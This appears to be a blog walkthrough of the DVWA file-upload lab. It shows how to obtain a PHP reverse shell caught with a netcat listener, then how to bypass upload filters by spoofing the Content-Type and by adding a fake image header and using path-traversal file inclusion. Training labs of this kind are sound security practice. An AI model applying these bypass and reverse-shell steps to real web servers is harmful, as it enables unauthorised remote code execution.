File Upload - DVWA | Aftab Sama

Security level: low

Create PHP reverse shell file rev.php.

Listing IP: 192.168.170.131 port: 9001

netcat listener command: nc -lvnp 9001

upload the file rev.php and visit the url : http://192.168.170.131/hackable/uploads/rev.php

and you have reverse shell:

Output:

┌─[✗]─[aftab@parrot]─[~/Downloads/dvwa]
└──╼ $nc -lvnp 9001
listening on [any] 9001 ...
connect to [192.168.170.131] from (UNKNOWN) [172.17.0.2] 54022
SOCKET: Shell has connected! PID: 331
whoami
www-data
uname
Linux

Security level: medium

This time it is blocking php file we can bypass that by changing:

Content-Type: application/x-php ==> Content-Type: image/png

we can also do that from browser go to inspect element ,Network tab resubmit the request so it show up on network tab select that upload request right click and Edit and Resend:

make changes and hit send button,visit the url and you have reverse shell.

Security level: high

Changing Content-Type is not working maybe server is verifying the file header signature.

add GIF98; at the start of our exploit file and rename it with rev.php.jpg.

but whene we visit it directly it is not working so we use file inclusion:

url: http://192.168.170.131/vulnerabilities/fi/?page=file/../../../hackable/uploads/rev.php.jpg <- security high

and we have reverse shell on our netcat listener.

Happy Hacking

Security level: low#

Security level: medium#

Security level: high#

Security level: low

Security level: medium

Security level: high